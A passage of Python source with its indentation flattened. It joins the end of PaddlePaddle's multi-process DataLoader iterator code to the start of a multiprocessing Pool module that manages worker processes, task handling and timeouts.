return _IterableDatasetFetcher(dataset, collate_fn, drop_last)
else:
raise NotImplementedError("unknown Dataset kind {}".format(kind))
class ParentWatchDog(object):
def __init__(self):
self._parent_pid = os.getppid()
self._parent_alive = True
def is_alive(self):
if self._parent_alive:
self._parent_alive = os.getppid() == self._parent_pid
return self._parent_alive
# worker information for each workers, used for splitting data copy
# for IteratorDataset in worker processes.
_worker_info = None
def get_worker_info():
"""
Get DataLoader worker process information function, this function is
used to split data copy in worker process for IterableDataset
(see :code:`paddle.io.IterableDataset`), worker information contains
following fields:
:attr:`num_workers`: total worker process number, see `paddle.io.DataLoader`
:attr:`id`: the worker processs id, count from 0 to :attr:`num_workers - 1`
:attr:`dataset`: the dataset object in this worker process
Returns:
WorkerInfo: an instance of WorkerInfo which contains fields above.
.. note::
For mode usage and exampls, please see :code:`paddle.io.IterableDataset`
Example:
.. code-block:: python
import math
import numpy as np
import paddle.fluid as fluid
from paddle.io import IterableDataset, DataLoader, get_worker_info
class SplitedIterableDataset(IterableDataset):
def __init__(self, start, end):
self.start = start
self.end = end
def __iter__(self):
worker_info = get_worker_info()
if worker_info is None:
iter_start = self.start
iter_end = self.end
else:
per_worker = int(
math.ceil((self.end - self.start) / float(
worker_info.num_workers)))
worker_id = worker_info.id
iter_start = self.start + worker_id * per_worker
iter_end = min(iter_start + per_worker, self.end)
for i in range(iter_start, iter_end):
yield np.array([i])
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
dataset = SplitedIterableDataset(start=2, end=9)
dataloader = DataLoader(
dataset,
places=place,
num_workers=2,
batch_size=1,
drop_last=True)
print(list(dataloader))
# outputs: [2, 5, 3, 6, 4, 7]
"""
return _worker_info
class WorkerInfo(object):
__initialized = False
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
self.__initialized = True
def __setattr__(self, key, val):
if self.__initialized:
raise RuntimeError("Cannot assign attributes to {} objects".format(
self.__class__.__name__))
return super(WorkerInfo, self).__setattr__(key, val)
class _DataLoaderIterBase(object):
"""
Iterator implement of DataLoader, will load and feed mini-batch
data by setting in given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._sampler_iter = iter(loader.batch_sampler)
self._collate_fn = loader.collate_fn or default_collate_fn
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_INDICES_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data to self._blocking_queue, mini-batch data
# will be get from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single process implement of DataLoaderIter, loading data from
loader.data in main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._collate_fn, True)
# NOTE: len(self._places) batch data compose as an output
# iteration, set blocking_queue can cache 2 iteration datas
# at most here
self._blocking_queue_capacity = 2 * len(self._places)
self._init_thread()
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
def _thread_loop(self):
try:
for indices in self._sampler_iter:
# read data from dataset in mini-batch
batch = self._dataset_fetcher.fetch(indices)
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if not isinstance(slot, core.LoDTensor):
self._check_input_array(slot)
# FIXME(dkp): blocking_queue only support
# core.LoDTensorArray as input now, read
# numpy data into a LoDTensorArray here,
# should support paddle.Tensor list later
if isinstance(slot, paddle.Tensor):
slot = slot.numpy()
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except StopIteration:
self._blocking_queue.close()
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning("DataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
@classmethod
def _check_input_array(cls, item):
if isinstance(item, paddle.Tensor):
return
arr = np.array(item)
if arr.dtype == np.object:
raise TypeError((
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor."))
def __next__(self):
try:
if in_dygraph_mode():
return self._reader.read_next_var_list()
else:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._reader.reset()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def __del__(self):
# _blocking_queue in keep order mode holds sub-threads
# need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
# NOTE(chenweihang): _worker_loop must be top level method to be pickled
def _worker_loop(dataset, dataset_kind, indices_queue, out_queue, done_event,
collate_fn, init_fn, worker_id, num_workers,
use_shared_memory):
try:
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
# set signal handler
core._set_process_signal_handler()
global _worker_info
_worker_info = WorkerInfo(
id=worker_id, num_workers=num_workers, dataset=dataset)
init_exception = None
try:
if init_fn is not None:
init_fn(worker_id)
fetcher = _DatasetKind.create_fetcher(dataset_kind, dataset,
collate_fn, True)
except:
init_exception = Exception("init_fn failed in worker {}: " \
"{}".format(worker_id, sys.exc_info()))
iterator_drained = False
parent_watch_dog = ParentWatchDog()
while parent_watch_dog.is_alive():
try:
data = indices_queue.get(MP_INDICES_CHECK_INTERVAL)
except queue.Empty:
continue
# None as poison piil, so worker event should be set
if data is None:
assert done_event.is_set() or iterator_drained, \
"get None when worker done_event set"
break
# If worker done event is set but get still get data in
# indices_queue, remaining data should be get and skipped.
if done_event.is_set() or iterator_drained:
continue
idx, indices = data
try:
if init_exception is not None:
batch = init_exception
init_exception = None
else:
batch = fetcher.fetch(indices)
except Exception as e:
if isinstance(
e, StopIteration) and dataset_kind == _DatasetKind.ITER:
out_queue.put(_IterableDatasetStopIteration(worker_id))
iterator_drained = True
else:
out_queue.put((idx, e))
else:
if use_shared_memory:
# FIXME(dkp): _convert_to_tensor_list only support np.array
# list now, should support paddle.Tensor list
if isinstance(batch[0][0], paddle.Tensor):
np_batch = []
for sample in batch:
np_batch.append([s.numpy() for s in sample])
batch = np_batch
tensor_list = core._convert_to_tensor_list(batch)
out_queue.put((idx, tensor_list))
core._remove_tensor_list_mmap_fds(tensor_list)
else:
out_queue.put((idx, batch))
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
finally:
if use_shared_memory:
_cleanup_mmap()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
# subprocess wrokers' result queue
self._data_queue = None
# data get from _data_queue will be reordered by _rcvd_idx
# for data order keeping, data index not equal _rcvd_idx
# will be cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
# indices outstand as _outstanding_capacity at first, and
# blocking_queue capacity is also _outstanding_capacity.
# _outstanding_capacity here to make sure each indices_queue
# has at least 2 indices, and outstanding batch cached
# output data for at least 2 iterations(Note that len(_places)
# batches will be composed as an iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
# multiprocess worker and indice queue list initial as empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
# event for workers and thread, thread event is only need
# in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._collate_fn, self._worker_init_fn, i,
self._num_workers, self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
def _shutdown_worker(self, worker_id):
if self._worker_status[worker_id]:
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
# set _workers_done_event should be set before put None
# to indices_queue, workers wll exit on reading None from
# indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i)
for w in self._workers:
w.join()
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _thread_loop(self):
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
elif isinstance(batch, Exception):
self._exit_thread_unexpectedly()
else:
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# LoDTensor not in shared memory is not
# serializable, cannot be create in workers
for slot in batch:
if not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
# For IterableDataset, batch indices is generated infinitely
# for each worker to raise StopIteration, but a StopIteration
# raising process will discard a batch indices which is count
# in _send_idx but will not increase _rcvd_idx, so we check
# whether the worker is still alive here to skip the discarded
# batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
info = self._task_infos[self._rcvd_idx]
if len(info) == 2 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
# NOTE: _rcvd_idx and _send_idx only record batches among
# workers, if batches among workers drained, there
# may also be data in blocking queue
if self._batches_outstanding < len(self._places):
return None
continue
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 2:
return self._task_infos.pop(self._rcvd_idx)[1]
try:
# [ avoid hang ]: main process may blocking at _reader.read_next when
# KeyboardInterrupt, we do following tradeoff:
# 1. get data with timeout, MP_INDICES_CHECK_INTERVAL(5s) as timeout
# default, if KeyboardInterrupt blocking, failed workers will be
# checked and raise RuntimeError to quit DataLoader in timeout
# exception handling.
# 2. if get data timeout and check workers all alive, continue to
# get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
# if a worker get StopIteraion, we shutdown this worker,
# note that this batch indices to trigger StopIteration
# is discard, outstanding batch number should be decrease
# and another indices should be put for other workers
# may still working.
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch = data
if idx == self._rcvd_idx:
del self._task_infos[idx]
return batch
else:
self._task_infos[idx] += (batch, )
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
# In multi-process mode for IterableDataset, _try_put_indices will
# be called both in main process(for our implement has blocking queue,
# and blocking queue read is in main process) and thread, which may
# cause error following error
# 1. "ValueError: generator already executing" in next(self._sampler_iter)
# 2. re-enter in increase _send_idx
# add a lock for threading save, for _try_put_indices is only a slight
# function which is not in data reading pipeline, this lock almost no
# influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def __next__(self):
try:
# _batches_outstanding here record the total batch data number
# in 'from after _try_put_indices to beforeoutput data', this
# value should be _outstanding_capacity if data is not drained,
# if _batches_outstanding is less than _places number, there are
# no enough data to generate next output, close blocking_queue and
# set _thread_done_event here, py_reader will raise StopIteration,
# end workers and indices_queues in StopIteration handling
if self._batches_outstanding < len(self._places):
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = self._reader.read_next_var_list()
else:
if self._return_list:
data = self._reader.read_next_list()
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
self._reader.reset()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
pool.py
|
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import pickle_loads, reset_signals, restart_state
from .compat import get_errno, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
# handled by # any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
SIGKILL = signal.SIGTERM
else:
from os import kill as _kill # noqa
SIGKILL = signal.SIGKILL
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
SIGMAP = dict(
(getattr(signal, n), n) for n in dir(signal) if n.startswith('SIG')
)
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def human_status(status):
if (status or 0) < 0:
try:
return 'signal {0} ({1})'.format(-status, SIGMAP[-status])
except KeyError:
return 'signal {0}'.format(-status)
return 'exitcode {0}'.format(status)
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
if util._logger:
util._logger.error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def __init__(self, value=1, verbose=None):
if PY3:
_Semaphore.__init__(self, value)
else:
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def grow(self):
if PY3:
cond = self._cond
else:
cond = self._Semaphore__cond
with cond:
self._initial_value += 1
self._Semaphore__value += 1
cond.notify()
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
_controlled_termination = False
_job_terminated = False
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True, max_memory_per_child=None):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self.max_memory_per_child = max_memory_per_child
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit()
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def terminate_controlled(self):
self._controlled_termination = True
self.terminate()
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
max_memory_per_child = self.max_memory_per_child
prepare_result = self.prepare_result
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
if max_memory_per_child > 0:
import resource
used_kb = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
if used_kb > 0:
if used_kb > max_memory_per_child:
error('child process exiting because it exceeded its maximum memory setting of %d KiB with %d KiB', max_memory_per_child, used_kb)
return EX_RECYCLE
else:
error('worker unable to determine worker memory usage')
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), signal.SIGTERM)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
# Keep maintaing workers until the cache gets drained, unless
# the pool is termianted
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
super(TaskHandler, self).__init__()
def body(self):
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
try:
i = -1
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception as exc:
error('Task Handler ERROR: %r', exc, exc_info=1)
break
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
_kill(worker.pid, SIGKILL)
except OSError:
pass
def handle_timeouts(self):
cache = self.cache
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
